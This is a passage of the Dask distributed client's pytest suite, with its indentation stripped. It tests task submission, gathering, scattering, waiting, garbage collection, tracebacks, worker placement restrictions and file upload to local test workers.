x = c.submit(slowinc, 1, delay=0.8)
x.release()
wait_for(lambda: not c.futures, timeout=0.3)
x = c.submit(div, 1, 0)
x.exception()
x.release()
wait_for(lambda: not c.futures, timeout=0.3)
def test_short_tracebacks(loop, c):
tblib = pytest.importorskip("tblib")
future = c.submit(div, 1, 0)
try:
future.result()
except Exception:
_, _, tb = sys.exc_info()
tb = tblib.Traceback(tb).to_dict()
n = 0
while tb is not None:
n += 1
tb = tb["tb_next"]
assert n < 5
@gen_cluster(client=True)
def test_map_naming(c, s, a, b):
L1 = c.map(inc, range(5))
L2 = c.map(inc, range(5))
assert [x.key for x in L1] == [x.key for x in L2]
L3 = c.map(inc, [1, 1, 1, 1])
assert len({x._state for x in L3}) == 1
L4 = c.map(inc, [1, 1, 1, 1], pure=False)
assert len({x._state for x in L4}) == 4
@gen_cluster(client=True)
def test_submit_naming(c, s, a, b):
a = c.submit(inc, 1)
b = c.submit(inc, 1)
assert a._state is b._state
c = c.submit(inc, 1, pure=False)
assert c.key != a.key
@gen_cluster(client=True)
def test_exceptions(c, s, a, b):
x = c.submit(div, 1, 2)
result = yield x
assert result == 1 / 2
x = c.submit(div, 1, 0)
with pytest.raises(ZeroDivisionError):
result = yield x
x = c.submit(div, 10, 2) # continues to operate
result = yield x
assert result == 10 / 2
@gen_cluster()
def test_gc(s, a, b):
c = yield Client(s.address, asynchronous=True)
x = c.submit(inc, 10)
yield x
assert s.tasks[x.key].who_has
x.__del__()
yield async_wait_for(
lambda: x.key not in s.tasks or not s.tasks[x.key].who_has, timeout=0.3
)
yield c.close()
def test_thread(c):
x = c.submit(inc, 1)
assert x.result() == 2
x = c.submit(slowinc, 1, delay=0.3)
with pytest.raises(gen.TimeoutError):
x.result(timeout=0.01)
assert x.result() == 2
def test_sync_exceptions(c):
x = c.submit(div, 10, 2)
assert x.result() == 5
y = c.submit(div, 10, 0)
try:
y.result()
assert False
except ZeroDivisionError:
pass
z = c.submit(div, 10, 5)
assert z.result() == 2
@gen_cluster(client=True)
def test_gather(c, s, a, b):
x = c.submit(inc, 10)
y = c.submit(inc, x)
result = yield c.gather(x)
assert result == 11
result = yield c.gather([x])
assert result == [11]
result = yield c.gather({"x": x, "y": [y]})
assert result == {"x": 11, "y": [12]}
@gen_cluster(client=True)
def test_gather_lost(c, s, a, b):
[x] = yield c.scatter([1], workers=a.address)
y = c.submit(inc, 1, workers=b.address)
yield a.close()
with pytest.raises(Exception):
res = yield c.gather([x, y])
def test_gather_sync(c):
x = c.submit(inc, 1)
assert c.gather(x) == 2
y = c.submit(div, 1, 0)
with pytest.raises(ZeroDivisionError):
c.gather([x, y])
[xx] = c.gather([x, y], errors="skip")
assert xx == 2
@gen_cluster(client=True)
def test_gather_strict(c, s, a, b):
x = c.submit(div, 2, 1)
y = c.submit(div, 1, 0)
with pytest.raises(ZeroDivisionError):
yield c.gather([x, y])
[xx] = yield c.gather([x, y], errors="skip")
assert xx == 2
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)])
def test_gather_skip(c, s, a):
x = c.submit(div, 1, 0, priority=10)
y = c.submit(slowinc, 1, delay=0.5)
with captured_logger(logging.getLogger("distributed.scheduler")) as sched:
with captured_logger(logging.getLogger("distributed.client")) as client:
L = yield c.gather([x, y], errors="skip")
assert L == [2]
assert not client.getvalue()
assert not sched.getvalue()
@gen_cluster(client=True)
def test_limit_concurrent_gathering(c, s, a, b):
futures = c.map(inc, range(100))
results = yield futures
assert len(a.outgoing_transfer_log) + len(b.outgoing_transfer_log) < 100
@gen_cluster(client=True, timeout=None)
def test_get(c, s, a, b):
future = c.get({"x": (inc, 1)}, "x", sync=False)
assert isinstance(future, Future)
result = yield future
assert result == 2
futures = c.get({"x": (inc, 1)}, ["x"], sync=False)
assert isinstance(futures[0], Future)
result = yield futures
assert result == [2]
result = yield c.get({}, [], sync=False)
assert result == []
result = yield c.get(
{("x", 1): (inc, 1), ("x", 2): (inc, ("x", 1))}, ("x", 2), sync=False
)
assert result == 3
def test_get_sync(c):
assert c.get({"x": (inc, 1)}, "x") == 2
def test_no_future_references(c):
from weakref import WeakSet
ws = WeakSet()
futures = c.map(inc, range(10))
ws.update(futures)
del futures
import gc
gc.collect()
start = time()
while list(ws):
sleep(0.01)
assert time() < start + 2
def test_get_sync_optimize_graph_passes_through(c):
bag = db.range(10, npartitions=3).map(inc)
dask.compute(bag.sum(), optimize_graph=False)
@gen_cluster(client=True)
def test_gather_errors(c, s, a, b):
def f(a, b):
raise TypeError
def g(a, b):
raise AttributeError
future_f = c.submit(f, 1, 2)
future_g = c.submit(g, 1, 2)
with pytest.raises(TypeError):
yield c.gather(future_f)
with pytest.raises(AttributeError):
yield c.gather(future_g)
yield a.close()
@gen_cluster(client=True)
def test_wait(c, s, a, b):
x = c.submit(inc, 1)
y = c.submit(inc, 1)
z = c.submit(inc, 2)
done, not_done = yield wait([x, y, z])
assert done == {x, y, z}
assert not_done == set()
assert x.status == y.status == "finished"
@gen_cluster(client=True)
def test_wait_first_completed(c, s, a, b):
x = c.submit(slowinc, 1)
y = c.submit(slowinc, 1)
z = c.submit(inc, 2)
done, not_done = yield wait([x, y, z], return_when="FIRST_COMPLETED")
assert done == {z}
assert not_done == {x, y}
assert z.status == "finished"
assert x.status == "pending"
assert y.status == "pending"
@gen_cluster(client=True, timeout=2)
def test_wait_timeout(c, s, a, b):
future = c.submit(sleep, 0.3)
with pytest.raises(gen.TimeoutError):
yield wait(future, timeout=0.01)
def test_wait_sync(c):
x = c.submit(inc, 1)
y = c.submit(inc, 2)
done, not_done = wait([x, y])
assert done == {x, y}
assert not_done == set()
assert x.status == y.status == "finished"
future = c.submit(sleep, 0.3)
with pytest.raises(gen.TimeoutError):
wait(future, timeout=0.01)
def test_wait_informative_error_for_timeouts(c):
x = c.submit(inc, 1)
y = c.submit(inc, 2)
try:
wait(x, y)
except Exception as e:
assert "timeout" in str(e)
assert "list" in str(e)
@gen_cluster(client=True)
def test_garbage_collection(c, s, a, b):
x = c.submit(inc, 1)
y = c.submit(inc, 1)
assert c.refcount[x.key] == 2
x.__del__()
yield gen.moment
assert c.refcount[x.key] == 1
z = c.submit(inc, y)
y.__del__()
yield gen.moment
result = yield z
assert result == 3
ykey = y.key
y.__del__()
yield gen.moment
assert ykey not in c.futures
@gen_cluster(client=True)
def test_garbage_collection_with_scatter(c, s, a, b):
[future] = yield c.scatter([1])
assert future.key in c.futures
assert future.status == "finished"
assert s.who_wants[future.key] == {c.id}
key = future.key
assert c.refcount[key] == 1
future.__del__()
yield gen.moment
assert c.refcount[key] == 0
start = time()
while True:
if key not in s.tasks or not s.tasks[key].who_has:
break
else:
assert time() < start + 3
yield gen.sleep(0.1)
@gen_cluster(timeout=1000, client=True)
def test_recompute_released_key(c, s, a, b):
x = c.submit(inc, 100)
result1 = yield x
xkey = x.key
del x
import gc
gc.collect()
yield gen.moment
assert c.refcount[xkey] == 0
# 1 second batching needs a second action to trigger
    while (xkey in s.tasks and s.tasks[xkey].who_has) or xkey in a.data or xkey in b.data:
yield gen.sleep(0.1)
x = c.submit(inc, 100)
assert x.key in c.futures
result2 = yield x
assert result1 == result2
@pytest.mark.slow
@gen_cluster(client=True)
def test_long_tasks_dont_trigger_timeout(c, s, a, b):
from time import sleep
x = c.submit(sleep, 3)
yield x
@pytest.mark.skip
@gen_cluster(client=True)
def test_missing_data_heals(c, s, a, b):
a.validate = False
b.validate = False
x = c.submit(inc, 1)
y = c.submit(inc, x)
z = c.submit(inc, y)
yield wait([x, y, z])
# Secretly delete y's key
if y.key in a.data:
del a.data[y.key]
a.release_key(y.key)
if y.key in b.data:
del b.data[y.key]
b.release_key(y.key)
yield gen.moment
w = c.submit(add, y, z)
result = yield w
assert result == 3 + 4
@pytest.mark.skip
@gen_cluster(client=True)
def test_gather_robust_to_missing_data(c, s, a, b):
a.validate = False
b.validate = False
x, y, z = c.map(inc, range(3))
yield wait([x, y, z]) # everything computed
for f in [x, y]:
for w in [a, b]:
if f.key in w.data:
del w.data[f.key]
yield gen.moment
w.release_key(f.key)
xx, yy, zz = yield c.gather([x, y, z])
assert (xx, yy, zz) == (1, 2, 3)
@pytest.mark.skip
@gen_cluster(client=True)
def test_gather_robust_to_nested_missing_data(c, s, a, b):
a.validate = False
b.validate = False
w = c.submit(inc, 1)
x = c.submit(inc, w)
y = c.submit(inc, x)
z = c.submit(inc, y)
yield wait([z])
for worker in [a, b]:
for datum in [y, z]:
if datum.key in worker.data:
del worker.data[datum.key]
yield gen.moment
worker.release_key(datum.key)
result = yield c.gather([z])
assert result == [inc(inc(inc(inc(1))))]
@gen_cluster(client=True)
def test_tokenize_on_futures(c, s, a, b):
x = c.submit(inc, 1)
y = c.submit(inc, 1)
tok = tokenize(x)
assert tokenize(x) == tokenize(x)
assert tokenize(x) == tokenize(y)
c.futures[x.key].finish()
assert tok == tokenize(y)
@pytest.mark.skipif(
not sys.platform.startswith("linux"), reason="Need 127.0.0.2 to mean localhost"
)
@gen_cluster([("127.0.0.1", 1), ("127.0.0.2", 2)], client=True)
def test_restrictions_submit(c, s, a, b):
x = c.submit(inc, 1, workers={a.ip})
y = c.submit(inc, x, workers={b.ip})
yield wait([x, y])
assert s.host_restrictions[x.key] == {a.ip}
assert x.key in a.data
assert s.host_restrictions[y.key] == {b.ip}
assert y.key in b.data
@gen_cluster(client=True)
def test_restrictions_ip_port(c, s, a, b):
x = c.submit(inc, 1, workers={a.address})
y = c.submit(inc, x, workers={b.address})
yield wait([x, y])
assert s.worker_restrictions[x.key] == {a.address}
assert x.key in a.data
assert s.worker_restrictions[y.key] == {b.address}
assert y.key in b.data
@pytest.mark.skipif(
not sys.platform.startswith("linux"), reason="Need 127.0.0.2 to mean localhost"
)
@gen_cluster([("127.0.0.1", 1), ("127.0.0.2", 2)], client=True)
def test_restrictions_map(c, s, a, b):
L = c.map(inc, range(5), workers={a.ip})
yield wait(L)
assert set(a.data) == {x.key for x in L}
assert not b.data
for x in L:
assert s.host_restrictions[x.key] == {a.ip}
L = c.map(inc, [10, 11, 12], workers=[{a.ip}, {a.ip, b.ip}, {b.ip}])
yield wait(L)
assert s.host_restrictions[L[0].key] == {a.ip}
assert s.host_restrictions[L[1].key] == {a.ip, b.ip}
assert s.host_restrictions[L[2].key] == {b.ip}
with pytest.raises(ValueError):
c.map(inc, [10, 11, 12], workers=[{a.ip}])
@pytest.mark.skipif(
not sys.platform.startswith("linux"), reason="Need 127.0.0.2 to mean localhost"
)
@gen_cluster([("127.0.0.1", 1), ("127.0.0.2", 2)], client=True)
def test_restrictions_get(c, s, a, b):
dsk = {"x": 1, "y": (inc, "x"), "z": (inc, "y")}
restrictions = {"y": {a.ip}, "z": {b.ip}}
futures = c.get(dsk, ["y", "z"], restrictions, sync=False)
result = yield futures
assert result == [2, 3]
assert "y" in a.data
assert "z" in b.data
@gen_cluster(client=True)
def dont_test_bad_restrictions_raise_exception(c, s, a, b):
z = c.submit(inc, 2, workers={"bad-address"})
try:
yield z
assert False
except ValueError as e:
assert "bad-address" in str(e)
assert z.key in str(e)
@gen_cluster(client=True, timeout=None)
def test_remove_worker(c, s, a, b):
L = c.map(inc, range(20))
yield wait(L)
yield b.close()
assert b.address not in s.workers
result = yield c.gather(L)
assert result == list(map(inc, range(20)))
@gen_cluster(nthreads=[("127.0.0.1", 1)], client=True)
def test_errors_dont_block(c, s, w):
L = [c.submit(inc, 1), c.submit(throws, 1), c.submit(inc, 2), c.submit(throws, 2)]
start = time()
while not (L[0].status == L[2].status == "finished"):
assert time() < start + 5
yield gen.sleep(0.01)
result = yield c.gather([L[0], L[2]])
assert result == [2, 3]
@gen_cluster(client=True)
def test_submit_quotes(c, s, a, b):
def assert_list(x, z=[]):
return isinstance(x, list) and isinstance(z, list)
x = c.submit(assert_list, [1, 2, 3])
result = yield x
assert result
x = c.submit(assert_list, [1, 2, 3], z=[4, 5, 6])
result = yield x
assert result
x = c.submit(inc, 1)
y = c.submit(inc, 2)
z = c.submit(assert_list, [x, y])
result = yield z
assert result
@gen_cluster(client=True)
def test_map_quotes(c, s, a, b):
def assert_list(x, z=[]):
return isinstance(x, list) and isinstance(z, list)
L = c.map(assert_list, [[1, 2, 3], [4]])
result = yield c.gather(L)
assert all(result)
L = c.map(assert_list, [[1, 2, 3], [4]], z=[10])
result = yield c.gather(L)
assert all(result)
L = c.map(assert_list, [[1, 2, 3], [4]], [[]] * 3)
result = yield c.gather(L)
assert all(result)
@gen_cluster()
def test_two_consecutive_clients_share_results(s, a, b):
c = yield Client(s.address, asynchronous=True)
x = c.submit(random.randint, 0, 1000, pure=True)
xx = yield x
f = yield Client(s.address, asynchronous=True)
y = f.submit(random.randint, 0, 1000, pure=True)
yy = yield y
assert xx == yy
yield c.close()
yield f.close()
@gen_cluster(client=True)
def test_submit_then_get_with_Future(c, s, a, b):
x = c.submit(slowinc, 1)
dsk = {"y": (inc, x)}
result = yield c.get(dsk, "y", sync=False)
assert result == 3
@gen_cluster(client=True)
def test_aliases(c, s, a, b):
x = c.submit(inc, 1)
dsk = {"y": x}
result = yield c.get(dsk, "y", sync=False)
assert result == 2
@gen_cluster(client=True)
def test_aliases_2(c, s, a, b):
dsk_keys = [
({"x": (inc, 1), "y": "x", "z": "x", "w": (add, "y", "z")}, ["y", "w"]),
({"x": "y", "y": 1}, ["x"]),
({"x": 1, "y": "x", "z": "y", "w": (inc, "z")}, ["w"]),
]
for dsk, keys in dsk_keys:
result = yield c.get(dsk, keys, sync=False)
assert list(result) == list(dask.get(dsk, keys))
yield gen.moment
@gen_cluster(client=True)
def test__scatter(c, s, a, b):
d = yield c.scatter({"y": 20})
assert isinstance(d["y"], Future)
assert a.data.get("y") == 20 or b.data.get("y") == 20
y_who_has = s.get_who_has(keys=["y"])["y"]
assert a.address in y_who_has or b.address in y_who_has
assert s.get_nbytes(summary=False) == {"y": sizeof(20)}
yy = yield c.gather([d["y"]])
assert yy == [20]
[x] = yield c.scatter([10])
assert isinstance(x, Future)
assert a.data.get(x.key) == 10 or b.data.get(x.key) == 10
xx = yield c.gather([x])
x_who_has = s.get_who_has(keys=[x.key])[x.key]
assert s.tasks[x.key].who_has
assert (
s.workers[a.address] in s.tasks[x.key].who_has
or s.workers[b.address] in s.tasks[x.key].who_has
)
assert s.get_nbytes(summary=False) == {"y": sizeof(20), x.key: sizeof(10)}
assert xx == [10]
z = c.submit(add, x, d["y"]) # submit works on Future
result = yield z
assert result == 10 + 20
result = yield c.gather([z, x])
assert result == [30, 10]
@gen_cluster(client=True)
def test__scatter_types(c, s, a, b):
d = yield c.scatter({"x": 1})
assert isinstance(d, dict)
assert list(d) == ["x"]
for seq in [[1], (1,), {1}, frozenset([1])]:
L = yield c.scatter(seq)
assert isinstance(L, type(seq))
assert len(L) == 1
s.validate_state()
seq = yield c.scatter(range(5))
assert isinstance(seq, list)
assert len(seq) == 5
s.validate_state()
@gen_cluster(client=True)
def test__scatter_non_list(c, s, a, b):
x = yield c.scatter(1)
assert isinstance(x, Future)
result = yield x
assert result == 1
@gen_cluster(client=True)
def test_scatter_hash(c, s, a, b):
[a] = yield c.scatter([1])
[b] = yield c.scatter([1])
assert a.key == b.key
s.validate_state()
@gen_cluster(client=True)
def test_scatter_tokenize_local(c, s, a, b):
from dask.base import normalize_token
class MyObj(object):
pass
L = []
@normalize_token.register(MyObj)
def f(x):
L.append(x)
return "x"
obj = MyObj()
future = yield c.scatter(obj)
assert L and L[0] is obj
@gen_cluster(client=True)
def test_scatter_singletons(c, s, a, b):
np = pytest.importorskip("numpy")
pd = pytest.importorskip("pandas")
for x in [1, np.ones(5), pd.DataFrame({"x": [1, 2, 3]})]:
future = yield c.scatter(x)
result = yield future
assert str(result) == str(x)
@gen_cluster(client=True)
def test_scatter_typename(c, s, a, b):
future = yield c.scatter(123)
assert future.key.startswith("int")
@gen_cluster(client=True)
def test_scatter_hash_2(c, s, a, b):
x = yield c.scatter(123)
y = yield c.scatter(123)
assert x.key == y.key
z = yield c.scatter(123, hash=False)
assert z.key != y.key
@gen_cluster(client=True)
def test_get_releases_data(c, s, a, b):
[x] = yield c.get({"x": (inc, 1)}, ["x"], sync=False)
import gc
gc.collect()
start = time()
while c.refcount["x"]:
yield gen.sleep(0.01)
assert time() < start + 2
def test_Current(s, a, b):
with Client(s["address"]) as c:
assert Client.current() is c
with pytest.raises(ValueError):
Client.current()
with Client(s["address"]) as c:
assert Client.current() is c
def test_global_clients(loop):
assert _get_global_client() is None
with pytest.raises(ValueError):
default_client()
with cluster() as (s, [a, b]):
with Client(s["address"], loop=loop) as c:
assert _get_global_client() is c
assert default_client() is c
with Client(s["address"], loop=loop) as f:
assert _get_global_client() is f
assert default_client() is f
assert default_client(c) is c
assert default_client(f) is f
assert _get_global_client() is None
@gen_cluster(client=True)
def test_exception_on_exception(c, s, a, b):
x = c.submit(lambda: 1 / 0)
y = c.submit(inc, x)
with pytest.raises(ZeroDivisionError):
yield y
z = c.submit(inc, y)
with pytest.raises(ZeroDivisionError):
yield z
@gen_cluster(client=True)
def test_get_nbytes(c, s, a, b):
[x] = yield c.scatter([1])
assert s.get_nbytes(summary=False) == {x.key: sizeof(1)}
y = c.submit(inc, x)
yield y
assert s.get_nbytes(summary=False) == {x.key: sizeof(1), y.key: sizeof(2)}
@pytest.mark.skipif(
not sys.platform.startswith("linux"), reason="Need 127.0.0.2 to mean localhost"
)
@gen_cluster([("127.0.0.1", 1), ("127.0.0.2", 2)], client=True)
def test_nbytes_determines_worker(c, s, a, b):
x = c.submit(identity, 1, workers=[a.ip])
y = c.submit(identity, tuple(range(100)), workers=[b.ip])
yield c.gather([x, y])
z = c.submit(lambda x, y: None, x, y)
yield z
assert s.tasks[z.key].who_has == {s.workers[b.address]}
@gen_cluster(client=True)
def test_if_intermediates_clear_on_error(c, s, a, b):
x = delayed(div, pure=True)(1, 0)
y = delayed(div, pure=True)(1, 2)
z = delayed(add, pure=True)(x, y)
f = c.compute(z)
with pytest.raises(ZeroDivisionError):
yield f
s.validate_state()
assert not any(ts.who_has for ts in s.tasks.values())
@gen_cluster(client=True)
def test_pragmatic_move_small_data_to_large_data(c, s, a, b):
np = pytest.importorskip("numpy")
lists = c.map(np.ones, [10000] * 10, pure=False)
sums = c.map(np.sum, lists)
total = c.submit(sum, sums)
def f(x, y):
return None
s.task_duration["f"] = 0.001
results = c.map(f, lists, [total] * 10)
yield wait([total])
yield wait(results)
assert (
sum(
s.tasks[r.key].who_has.issubset(s.tasks[l.key].who_has)
for l, r in zip(lists, results)
)
>= 9
)
@gen_cluster(client=True)
def test_get_with_non_list_key(c, s, a, b):
dsk = {("x", 0): (inc, 1), 5: (inc, 2)}
x = yield c.get(dsk, ("x", 0), sync=False)
y = yield c.get(dsk, 5, sync=False)
assert x == 2
assert y == 3
@gen_cluster(client=True)
def test_get_with_error(c, s, a, b):
dsk = {"x": (div, 1, 0), "y": (inc, "x")}
with pytest.raises(ZeroDivisionError):
yield c.get(dsk, "y", sync=False)
def test_get_with_error_sync(c):
dsk = {"x": (div, 1, 0), "y": (inc, "x")}
with pytest.raises(ZeroDivisionError):
c.get(dsk, "y")
@gen_cluster(client=True)
def test_directed_scatter(c, s, a, b):
yield c.scatter([1, 2, 3], workers=[a.address])
assert len(a.data) == 3
assert not b.data
yield c.scatter([4, 5], workers=[b.name])
assert len(b.data) == 2
def test_directed_scatter_sync(c, s, a, b, loop):
futures = c.scatter([1, 2, 3], workers=[b["address"]])
has_what = sync(loop, c.scheduler.has_what)
assert len(has_what[b["address"]]) == len(futures)
assert len(has_what[a["address"]]) == 0
@gen_cluster(client=True)
def test_scatter_direct(c, s, a, b):
future = yield c.scatter(123, direct=True)
assert future.key in a.data or future.key in b.data
assert s.tasks[future.key].who_has
assert future.status == "finished"
result = yield future
assert result == 123
assert not s.counters["op"].components[0]["scatter"]
result = yield future
assert not s.counters["op"].components[0]["gather"]
result = yield c.gather(future)
assert not s.counters["op"].components[0]["gather"]
@gen_cluster(client=True)
def test_scatter_direct_numpy(c, s, a, b):
np = pytest.importorskip("numpy")
x = np.ones(5)
future = yield c.scatter(x, direct=True)
result = yield future
assert np.allclose(x, result)
assert not s.counters["op"].components[0]["scatter"]
@gen_cluster(client=True)
def test_scatter_direct_broadcast(c, s, a, b):
future2 = yield c.scatter(456, direct=True, broadcast=True)
assert future2.key in a.data
assert future2.key in b.data
assert s.tasks[future2.key].who_has == {s.workers[a.address], s.workers[b.address]}
result = yield future2
assert result == 456
assert not s.counters["op"].components[0]["scatter"]
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 4)
def test_scatter_direct_balanced(c, s, *workers):
futures = yield c.scatter([1, 2, 3], direct=True)
assert sorted([len(w.data) for w in workers]) == [0, 1, 1, 1]
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 4)
def test_scatter_direct_broadcast_target(c, s, *workers):
futures = yield c.scatter([123, 456], direct=True, workers=workers[0].address)
assert futures[0].key in workers[0].data
assert futures[1].key in workers[0].data
futures = yield c.scatter(
[123, 456],
direct=True,
broadcast=True,
workers=[w.address for w in workers[:3]],
)
    assert all(
        f.key in w.data and s.workers[w.address] in s.tasks[f.key].who_has
        for f in futures
        for w in workers[:3]
    )
@gen_cluster(client=True, nthreads=[])
def test_scatter_direct_empty(c, s):
with pytest.raises((ValueError, gen.TimeoutError)):
yield c.scatter(123, direct=True, timeout=0.1)
@gen_cluster(client=True, timeout=None, nthreads=[("127.0.0.1", 1)] * 5)
def test_scatter_direct_spread_evenly(c, s, *workers):
futures = []
for i in range(10):
future = yield c.scatter(i, direct=True)
futures.append(future)
assert all(w.data for w in workers)
@pytest.mark.parametrize("direct", [True, False])
@pytest.mark.parametrize("broadcast", [True, False])
def test_scatter_gather_sync(c, direct, broadcast):
futures = c.scatter([1, 2, 3], direct=direct, broadcast=broadcast)
results = c.gather(futures, direct=direct)
assert results == [1, 2, 3]
delayed(inc)(1).compute(direct=direct)
@gen_cluster(client=True)
def test_gather_direct(c, s, a, b):
futures = yield c.scatter([1, 2, 3])
data = yield c.gather(futures, direct=True)
assert data == [1, 2, 3]
@gen_cluster(client=True)
def test_many_submits_spread_evenly(c, s, a, b):
L = [c.submit(inc, i) for i in range(10)]
yield wait(L)
assert a.data and b.data
@gen_cluster(client=True)
def test_traceback(c, s, a, b):
x = c.submit(div, 1, 0)
tb = yield x.traceback()
if sys.version_info[0] >= 3:
assert any("x / y" in line for line in pluck(3, traceback.extract_tb(tb)))
@gen_cluster(client=True)
def test_get_traceback(c, s, a, b):
try:
yield c.get({"x": (div, 1, 0)}, "x", sync=False)
except ZeroDivisionError:
exc_type, exc_value, exc_traceback = sys.exc_info()
L = traceback.format_tb(exc_traceback)
assert any("x / y" in line for line in L)
@gen_cluster(client=True)
def test_gather_traceback(c, s, a, b):
x = c.submit(div, 1, 0)
try:
yield c.gather(x)
except ZeroDivisionError:
exc_type, exc_value, exc_traceback = sys.exc_info()
L = traceback.format_tb(exc_traceback)
assert any("x / y" in line for line in L)
def test_traceback_sync(c):
x = c.submit(div, 1, 0)
tb = x.traceback()
if sys.version_info[0] >= 3:
assert any(
"x / y" in line
for line in concat(traceback.extract_tb(tb))
if isinstance(line, str)
)
y = c.submit(inc, x)
tb2 = y.traceback()
assert set(pluck(3, traceback.extract_tb(tb2))).issuperset(
set(pluck(3, traceback.extract_tb(tb)))
)
z = c.submit(div, 1, 2)
tb = z.traceback()
assert tb is None
@gen_cluster(client=True)
def test_upload_file(c, s, a, b):
def g():
import myfile
return myfile.f()
with save_sys_modules():
for value in [123, 456]:
with tmp_text("myfile.py", "def f():\n return {}".format(value)) as fn:
yield c.upload_file(fn)
x = c.submit(g, pure=False)
result = yield x
assert result == value
@gen_cluster(client=True)
def test_upload_file_no_extension(c, s, a, b):
with tmp_text("myfile", "") as fn:
yield c.upload_file(fn)
@gen_cluster(client=True)
def test_upload_file_zip(c, s, a, b):
def g():
import myfile
return myfile.f()
with save_sys_modules():
try:
for value in [123, 456]:
with tmp_text(
"myfile.py", "def f():\n return {}".format(value)
) as fn_my_file:
with zipfile.ZipFile("myfile.zip", "w") as z:
z.write(fn_my_file, arcname=os.path.basename(fn_my_file))
yield c.upload_file("myfile.zip")
x = c.submit(g, pure=False)
result = yield x
assert result == value
finally:
if os.path.exists("myfile.zip"):
os.remove("myfile.zip")
@gen_cluster(client=True)
def test_upload_file_egg(c, s, a, b):
def g():
import package_1, package_2
return package_1.a, package_2.b
# c.upload_file tells each worker to
# - put this file in their local_directory
# - modify their sys.path to include it
# we don't care about the local_directory
# but we do care about restoring the path
with save_sys_modules():
for value in [123, 456]:
with tmpfile() as dirname:
os.mkdir(dirname)
with open(os.path.join(dirname, "setup.py"), "w") as f:
f.write("from setuptools import setup, find_packages\n")
f.write(
'setup(name="my_package", packages=find_packages(), version="{}")\n'.format(
value
)
)
# test a package with an underscore in the name
package_1 = os.path.join(dirname, "package_1")
os.mkdir(package_1)
with open(os.path.join(package_1, "__init__.py"), "w") as f:
f.write("a = {}\n".format(value))
# test multiple top-level packages
package_2 = os.path.join(dirname, "package_2")
os.mkdir(package_2)
with open(os.path.join(package_2, "__init__.py"), "w") as f:
f.write("b = {}\n".format(value))
# compile these into an egg
subprocess.check_call(
[sys.executable, "setup.py", "bdist_egg"], cwd=dirname
)
egg_root = os.path.join(dirname, "dist")
# first file ending with '.egg'
egg_name = [
fname for fname in os.listdir(egg_root) if fname.endswith(".egg")
][0]
egg_path = os.path.join(egg_root, egg_name)
yield c.upload_file(egg_path)
os.remove(egg_path)
x = c.submit(g, pure=False)
result = yield x
assert result == (value, value)
@gen_cluster(client=True)
def test_upload_large_file(c, s, a, b):
assert a.local_directory
assert b.local_directory
with tmp_text("myfile", "abc") as fn:
with tmp_text("myfile2", "def") as fn2:
yield c._upload_large_file(fn, remote_filename="x")
yield c._upload_large_file(fn2)
for w in [a, b]:
assert os.path.exists(os.path.join(w.local_directory, "x"))
assert os.path.exists(os.path.join(w.local_directory, "myfile2"))
with open(os.path.join(w.local_directory, "x")) as f:
assert f.read() == "abc"
with open(os.path.join(w.local_directory, "myfile2")) as f:
assert f.read() == "def"
def test_upload_file_sync(c):
def g():
import myfile
return myfile.x
with tmp_text("myfile.py", "x = 123") as fn:
c.upload_file(fn)
x = c.submit(g)
assert x.result() == 123
@gen_cluster(client=True)
def test_upload_file_exception(c, s, a, b):
with tmp_text("myfile.py", "syntax-error!") as fn:
with pytest.raises(SyntaxError):
yield c.upload_file(fn)
def test_upload_file_exception_sync(c):
with tmp_text("myfile.py", "syntax-error!") as fn:
with pytest.raises(SyntaxError):
c.upload_file(fn)
@pytest.mark.skip
@gen_cluster()
def test_multiple_clients(s, a, b):
a = yield Client(s.address, asynchronous=True)
b = yield Client(s.address, asynchronous=True)
x = a.submit(inc, 1)
y = b.submit(inc, 2)
assert x.client is a
assert y.client is b
xx = yield x
yy = yield y
assert xx == 2
assert yy == 3
z = a.submit(add, x, y)
assert z.client is a
zz = yield z
assert zz == 5
yield a.close()
yield b.close()
@gen_cluster(client=True)
def test_async_compute(c, s, a, b):
from dask.delayed import delayed
x = delayed(1)
y = delayed(inc)(x)
z = delayed(dec)(x)
[yy, zz, aa] = c.compute([y, z, 3], sync=False)
assert isinstance(yy, Future)
assert isinstance(zz, Future)
assert aa == 3
result = yield c.gather([yy, zz])
assert result == [2, 0]
assert isinstance(c.compute(y), Future)
assert isinstance(c.compute([y]), (tuple, list))
@gen_cluster(client=True)
def test_async_compute_with_scatter(c, s, a, b):
d = yield c.scatter({("x", 1): 1, ("y", 1): 2})
x, y = d[("x", 1)], d[("y", 1)]
from dask.delayed import delayed
z = delayed(add)(delayed(inc)(x), delayed(inc)(y))
zz = c.compute(z)
[result] = yield c.gather([zz])
assert result == 2 + 3
def test_sync_compute(c):
x = delayed(1)
y = delayed(inc)(x)
z = delayed(dec)(x)
yy, zz = c.compute([y, z], sync=True)
assert (yy, zz) == (2, 0)
@gen_cluster(client=True)
def test_remote_scatter_gather(c, s, a, b):
x, y, z = yield c.scatter([1, 2, 3])
assert x.key in a.data or x.key in b.data
assert y.key in a.data or y.key in b.data
assert z.key in a.data or z.key in b.data
xx, yy, zz = yield c.gather([x, y, z])
assert (xx, yy, zz) == (1, 2, 3)
@gen_cluster(timeout=1000, client=True)
def test_remote_submit_on_Future(c, s, a, b):
x = c.submit(lambda x: x + 1, 1)
y = c.submit(lambda x: x + 1, x)
result = yield y
assert result == 3
def test_start_is_idempotent(c):
c.start()
c.start()
c.start()
x = c.submit(inc, 1)
assert x.result() == 2
@gen_cluster(client=True)
def test_client_with_scheduler(c, s, a, b):
assert s.nthreads == {a.address: a.nthreads, b.address: b.nthreads}
x = c.submit(inc, 1)
y = c.submit(inc, 2)
z = c.submit(add, x, y)
result = yield x
assert result == 1 + 1
result = yield z
assert result == 1 + 1 + 1 + 2
A, B, C = yield c.scatter([1, 2, 3])
AA, BB, xx = yield c.gather([A, B, x])
assert (AA, BB, xx) == (1, 2, 2)
result = yield c.get({"x": (inc, 1), "y": (add, "x", 10)}, "y", sync=False)
assert result == 12
@pytest.mark.skipif(
not sys.platform.startswith("linux"), reason="Need 127.0.0.2 to mean localhost"
)
@gen_cluster([("127.0.0.1", 1), ("127.0.0.2", 2)], client=True)
def test_allow_restrictions(c, s, a, b):
aws = s.workers[a.address]
    bws = s.workers[b.address]
x = c.submit(inc, 1, workers=a.ip)
yield x
assert s.tasks[x.key].who_has == {aws}
assert not s.loose_restrictions
x = c.submit(inc, 2, workers=a.ip, allow_other_workers=True)
yield x
assert s.tasks[x.key].who_has == {aws}
assert x.key in s.loose_restrictions
L = c.map(inc, range(3, 13), workers=a.ip, allow_other_workers=True)
yield wait(L)
